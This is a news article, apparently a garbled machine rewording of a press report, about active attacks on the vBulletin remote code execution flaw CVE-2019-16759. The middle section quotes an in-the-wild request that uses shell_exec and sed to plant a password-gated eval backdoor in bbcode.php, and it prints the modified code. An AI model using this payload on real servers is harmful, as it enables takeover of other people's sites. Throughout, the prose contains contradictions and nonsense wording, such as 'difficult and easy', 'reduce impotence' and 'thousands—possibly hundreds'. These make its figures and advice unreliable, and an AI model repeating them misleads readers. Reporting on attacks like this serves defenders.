Attackers are exploiting an anonymously disclosed vulnerability that makes it possible to take control of servers running vBulletin, one of the most popular Internet applications for website comments. Sites running the app should accept comments offline until administrators install a patch that vBulletin developers released Wednesday morning.
The weakness is revealed by the version 18-line exploit published on Monday by an unknown person. The exploit allows unauthenticated attackers to execute remote malicious code on just about any vBulletin server running versions 5.0.0 through 5.5.4. The vulnerability is so difficult and easy to exploit that some critics have described it as a backdoor.
“Essentially, any attack requires very simple command injection,” Ryan Seguin, a research engineer at Tenable, told Ars. “An attacker sends the payload, vBulletin then executes the command, and it responds back to the attacker with whatever they ask for. If an attacker issues a shell command as part of an injection, vBulletin will execute Linux commands on your host with whatever permissions vBulletins’ user-level user account has access to.” Seguin has more this knowledge analysis of weakness.
According to researcher Troy Mursch of the security intelligence service Bad Packets, attackers are using botnets to exploit vulnerable servers. After the change, some of the web requests they send look like this:
"widgetConfig(code)=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST(\"epass\")) \&\& \$_REQUEST(\"epass\") == \"2dmfrb28nu3c6s9j\") eval(\$code); /g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"
Prior to the malicious web request, the code was part of vBulletin called
includes/vb5/frontend/controller/bbcode.php
look like this:
function evalCode($code)
ob_start();
eval($code);
$output = ob_get_contents();
ob_end_clean();
return $output;
After the web request is sent, the same section is changed to this:
function evalCode($code)
ob_start();
if (isset($_REQUEST("epass")) && $_REQUEST("epass") == "2dmfrb28nu3c6s9j") eval($code);
$output = ob_get_contents();
ob_end_clean();
return $output;
Mursch told Ars:
The exploit above modifies
includes/vb5/frontend/controller/bbcode.phpvia the “sed” command to add a backdoor to the code. This is done by setting the “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function that 2dmfrb28nu3c6s9j has set in future requests sent to the server. This would allow the command-and-control (C2) server botnet to exploit CVE-2019-16759 exclusively and issue commands to the targeted site.
The vulnerability itself has been regarded by some as a back door. This exploit attempt basically back sites through the back door. For the reason that threat actors are doing this, it is possible to build an inventory of bots while they think of additional ways to exploit the infected hosts – such as infecting them with DDoS malware and performing service attacks- writing
Some of the infected computers carrying out the attacks were previously found to be using the EternalBlue exploit, developed by and later stolen from the National Security Agency, to infect computers that had not been installed A Microsoft patch was released in early 2017.
Some vBulletin users took to the software’s official support pages on Wednesday to report that they had been hacked. “I received an email today from my hosting provider saying ‘we have detected malicious code on your website and a large number of spam email messages originating from you,'” one user write here (free account required). Another user reported having the entire MySQL database deleted.
vBulletin is among the most popular web hosting systems and is used on thousands—possibly hundreds—of sites. Fortunately, version 5x accounts for less than 7% of active installs, according to W3techs, a site that researches software used across the Internet. However, Internet searches like This suggest that 10,000 or more sites may be running vulnerable versions.
Used for years
According to Chaouki Bekrar, founder and CEO of exploit broker Zerodium, the vulnerability has been circulating privately for years.
Recently vBulletin pre-auth RCE 0day was revealed by a researcher on full display as a bugdoor, a perfect candidate for @PwnieAwards 2020. Easy to spot and exploit.
Many researchers have been selling this abuse for years. @Zerodium The customer was aware of it since 3 years
– Chaouki Bekrar (@cBekrar) September 25, 2019
“Many researchers have been selling this exploit for years,” he said wrote on Twitter. “Zerodium customers know about it since 3 years.”
Finding a working exploit is aggravated by other public postings that uses the Shodan search field to find vulnerable servers. Attackers can use it to generate a list of vulnerable vBulletin sites and then exploit it to take over them.
Weakness-which you track as CVE-2019-16759— is included in the default installation of the affected versions. According to Tenable’s publicly posted analysis, “An unauthenticated attacker could send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. These commands will be executed with the permissions of the user account that the vBulletin service is using. Depending on the service user’s permissions, this can take complete control of a host.”
As previously advised, the vulnerability is so severe that affected vBulletin users should take their forums offline until they are fixed. Developer patch published on Wednesday morning. Them comment system for Defcon.org, a site that regularly searches for hack-to-hack vulnerabilities, is not active at the time this post is live. Several hours later the user forum returned.
Defcon founder Jeff Moss, told Ars that his team adopted the site to avoid hacking.
“We immediately tested and none of our defenses will save us,” he said. “We checked the accounts and such and there were no attempts to attack us, but after we went back a line there were two in the first 30 minutes. Definitely active attacks.”
Before a patch was available, people reported that they were able to successfully reduce impotence by following the instructions Here. Now that a patch is available, affected vBulletin users should install it at once.
This post has been updated to include abuse details from Mursch and comments from Moss.